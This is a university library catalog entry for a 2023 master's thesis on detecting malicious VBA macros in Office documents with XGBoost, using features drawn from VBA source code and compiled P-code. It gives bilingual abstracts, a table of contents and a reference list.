簡易檢索 / 詳目顯示

研究生: 賴怡誠
Yi-Cheng Lai
論文名稱: 機器學習應用於 Office 文件之惡意 VBA 巨集檢測
Malicious VBA Macro Detection in Office Document Using Machine Learning
指導教授: 陳俊良
Jiann-Liang Chen
口試委員: 黃能富
Nen-Fu Huang
呂政修
Jenq-Shiou Leu
洪論評
Lun-Ping Hung
鄧德雋
Der-Jiunn Deng
陳俊良
Jiann-Liang Chen
學位類別: 碩士
Master
系所名稱: 電資學院 - 電機工程系
Department of Electrical Engineering
論文出版年: 2023
畢業學年度: 111
語文別: 英文
論文頁數: 65
中文關鍵詞: 機器學習XGBoostOffice文件惡意VBA巨集P-codeNLP技術
外文關鍵詞: Machine Learning, XGBoost, Malicious VBA Macro, Office Document, P-code, NLP
相關次數: 點閱:192下載:1
分享至:
查詢本校圖書館目錄 查詢臺灣博碩士論文知識加值系統 勘誤回報
  • 近年來,隨著企業和個人對於數位化服務的需求,大量極具價值的資料存在於網路空間。Microsoft Office作為市占率最高的辦公軟體,不論是在商業、學術或政府機構中都被廣泛使用,也因此成為網路罪犯最常攻擊的目標之一。散布惡意Office文件被攻擊者大量用於實施網路攻擊的載體,例如在魚叉式網路釣魚攻擊中,經常使用帶有惡意VBA巨集的Office文件來達成惡意檔案下載或惡意指令執行的目的。
    VBA (Visual Basic for Applications)巨集是一種可以在Microsoft Office應用程式中執行的自動化腳本,它可以執行多種功能,包括自動執行特定任務、操作檔案系統和執行外部程式等,對於簡化重複性工作有相當大的助益。惡意 VBA 巨集攻擊常利用魚叉式釣魚攻擊作為管道,透過社交工程的技巧,巧妙地誘使受害者啟用巨集,從而執行惡意程式。攻擊者可以利用這些攻擊進行各種活動,包括竊取敏感資訊、傳播惡意軟體或透過加密文件索要贖金等。
    本研究以靜態分析的方式檢測帶有惡意VBA巨集的Office文件,有別以往採用對VBA source code的分析,本研究也針對VBA經過編譯產生的P-code進行處理,從中提取指令序列,透過NLP技術與降維技術生成指令序列嵌入。最終,分別從VBA source code與P-code中提取了共85個特徵來建立模型。
    本研究採用XGBoost作為檢測模型,透過該模型評估本研究所提出的各項特徵重要性,並以綜合特徵建構檢測模型。經過實驗,模型在驗證資料集中達到98.70%的準確率,證實本研究提出之惡意VBA巨集檢測系統優於先前的研究。


    In recent years, the internet has been flooded with valuable information as businesses and individuals demand digital services. Microsoft Office is the most widely used office software with the highest market share. It is widely used in business, academic, and government institutions, making it one of the most interesting targets for cybercriminals. Attackers often use Office documents as vectors for cyberattacks. For example, Office documents with malicious VBA macros are often used to download malicious files or execute malicious commands in spear-phishing attacks.
    VBA (Visual Basic for Applications) macro is an automation script that can be executed within a Microsoft Office application. It can perform various functions, including automating specific tasks, manipulating the file system, and executing external programs. It is helpful to simplify repetitive tasks. Malicious VBA macro attacks usually use spear-phishing attacks as a channel to subtly lure users into enabling macros to execute malicious code through social engineering techniques. Attackers can use these attacks for various activities, including stealing sensitive information, encrypting files and demanding ransom, spreading malware, and more.
    This study uses static analysis combined with machine learning techniques to detect documents with VBA macros. Different from previous studies that only focused on the analysis of VBA source code, this study also processes the P-code generated by VBA compilation, extracts instruction sequences, and generates embeddings using NLP techniques. Finally, a total of 85 features were extracted to build the model.
    This study uses XGBoost as a detection model, extracts a total of 85 features from VBA source code and P-code for model training, and evaluates the importance of each feature proposed in this study through this model. After experiments, the model accuracy achieved 98.70% in the validation dataset, which confirms that the proposed VBA office document detection system outperforms previous studies.

    摘要 1 Abstract 2 List of Figures 6 List of Tables 8 Chapter 1 Introduction 9 1.1 Motivation 9 1.2 Contributions 13 1.3 Organization 14 Chapter 2 Related Work 16 2.1 Microsoft Office files 16 2.2 VBA Macro 18 2.3 Malicious Macro Threats 19 2.4 Detection of Malicious VBA Scripts 20 2.4.1 Static Analysis of VBA Macro 20 2.4.2 Dynamic Analysis of VBA Macro 21 2.4.3 Machine Learning Approach 23 Chapter 3 Proposed System 25 3.1 System Architecture 25 3.2 Data Collection 26 3.2.1 Crawler Technology 26 3.2.2 Data Source 27 3.3 Data Preprocessing 28 3.3.1 VBA-behavior-based Features 29 3.3.2 P-code-structure-based Features 30 3.4 Feature Definition 30 3.4.1 VBA-behavior-based Features 31 3.4.2 P-code-structure-based Features 35 3.5 Detection Model Architecture 40 Chapter 4 Performance Analysis 43 4.1 System Environment and Parameter Settings 43 4.2 Performance Evaluation Metrics 46 4.3 Performance Analysis 47 4.3.1 Feature Analysis of VBA-behavior-based 47 4.3.2 Feature Analysis of P-code-structure-based 48 4.3.3 Feature Analysis of All Features 52 4.4 Comparison of Different Study 53 4.5 Summary 54 Chapter 5 Conclusions and Future Works 56 5.1 Conclusions 56 5.2 Future Works 57

    [1] Check Point, Check Point Research Reports in 2022 Global Cyberattacks, Retrieved from https://blog.checkpoint.com/2023/01/05/38-increase-in-2022-global-cyberattacks/ (last visited on 2023/07/04)
    [2] Statista, Cybercrime Expected To Skyrocket in Coming Years, Retrieved from https://www.statista.com/chart/28878/expected-cost-of-cybercrime-until-2027/ (last visited on 2023/07/04)
    [3] Security Intelligence, How ChatGPT Can Help Cybersecurity Pros Beat Attacks, Retrieved from https://securityintelligence.com/news/how-chatgpt-can-help-beat-attacks/ (last visited on 2023/07/04)
    [4] Netscope, Microsoft Office: VBA Blocked By Default in Files From the Internet, Retrieved from https://www.netskope.com/blog/office-documents-and-cloud-apps-perfect-for-malware-delivery (last visited on 2023/07/04)
    [5] VirusTotal, 2021 Malware Trends Report, Retrieved from https://assets.virustotal.com/reports/2021trends.pdf (last visited on 2023/07/04)
    [6] Microsoft, Open XML Formats and file name extensions, Retrieved from https://support.microsoft.com/en-us/office/open-xml-formats-and-file-name-extensions-5200d93c-3449-4380-8e11-31ef14555b18 (last visited on 2023/07/04)
    [7] Microsoft, VBA Language Specification, Retrieved from https://learn.microsoft.com/en-us/openspecs/microsoft_general_purpose_programming_languages/ms-vbal/d5418146-0bd2-45eb-9c7a-fd9502722c74?redirectedfrom=MSDN (last visited on 2023/07/04)
    [8] BrainBell, A Little About P-Code, Retrieved from https://www.brainbell.com/tutors/Visual_Basic/A_Little_About_P_Code.htm (last visited on 2023/07/04)
    [9] MITER ATT&CK, T1564.007 Hide Artifacts: VBA Stomping, Retrieved from https://attack.mitre.org/techniques/T1564/007/ (last visited on 2023/07/04)
    [10] The Virus Encyclopedia, Concept Virus, Retrieved from http://virus.wikidot.com/concept (last visited on 2023/07/04)
    [11] MITER ATT&CK, S0367 Software: Emotet, Retrieved from https://attack.mitre.org/software/S0367/ (last visited on 2023/07/04)
    [12] MITER ATT&CK, S0089 Software: BlackEnergy, Retrieved from https://attack.mitre.org/software/S0089/ (last visited on 2023/07/04)
    [13] Malwarebytes, Ransom.Locky, Retrieved from https://www.malwarebytes.com/blog/detections/ransom-locky (last visited on 2023/07/04)
    [14] Kaspersky, Security Bulletin 2021 Statistics, Retrieved from https://go.kaspersky.com/rs/802-IJN-240/images/KSB_statistics_2021_eng.pdf (last visited on 2023/07/04)
    [15] M. Gutfleisch, M. Peiffer, S. Erk, and M. A. Sasse, "Microsoft Office Macro Warnings: A Design Comedy of Errors with Tragic Security Consequences," Proceedings of the European Symposium on Usable Security, pp. 9-22, 2021.
    [16] P. Lagadec, oletools - python tools to analyze OLE and MS office files, Retrieved from https://www.decalage.info/python/oletools (last visited on 2023/07/04)
    [17] P. Lagadec, ViperMonkey - VBA emulation engine, Retrieved from https://github.com/decalage2/ViperMonkey (last visited on 2023/07/04)
    [18] MalwareCantFly, Vba2Graph - generates the VBA call graph, Retrieved from https://github.com/MalwareCantFly/Vba2Graph (last visited on 2023/07/04)
    [19] Cuckoo, What is Cuckoo?, Retrieved from https://cuckoo.sh/docs/introduction/what.html (last visited on 2023/07/04)
    [20] R. Khan, N. Kumar, A. Handa, and S. K. Shukla, "Malware Detection in Word Documents Using Machine Learning," Proceedings of the International Conference on Advances in Cyber Security, pp 325–339, 2020.
    [21] M. Mimura, "An Improved Method of Detecting Macro Malware on an Imbalanced Dataset," IEEE Access, vol. 8, pp. 204709-204717, 2020.
    [22] S. Huneault-Leblanc, and C. Talhi, "P-Code Based Classification to Detect Malicious VBA Macro," Proceedings of the International Symposium on Networks, Computers and Communication, pp. 1-6, 2020.
    [23] F. Casino, N. Totosis, T. Apostolopoulos, N. Lykousas, and C. Patsakis, "Analysis and Correlation of Visual Evidence in Campaigns of Malicious Office Documents," Digital Threats, 2022.
    [24] J. Yan, M. Wan, X. Jia, L. Ying, P. Su, and Z. Wang, "DitDetector: Bimodal Learning based on Deceptive Image and Text for Macro Malware Detection," Proceedings of the Computer Security Applications Conference, pp. 227-239, 2022.
    [25] V. Ravi, S. P. Gururaj, H. K. Vedamurthy, and M. B. Nirmala, "Analysing corpus of office documents for macro-based attacks using Machine Learning," Proceedings of the International Conference on Intelligent Engineering Approach, vol. 3, pp 20-24, 2022.
    [26] T. Chen, and C. Guestrin, "Xgboost: A scalable tree boosting system," Proceedings of the ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 785-794, 2016.
    [27] Contextures, Contextures Excel Resources, Retrieved from https://www.contextures.com/index.html (last visited on 2023/07/04)
    [28] Sitestory, Excel VBA macros, Retrieved from https://sitestory.dk/excel_vba/vba-start-page.htm (last visited on 2023/07/04)

    QR CODE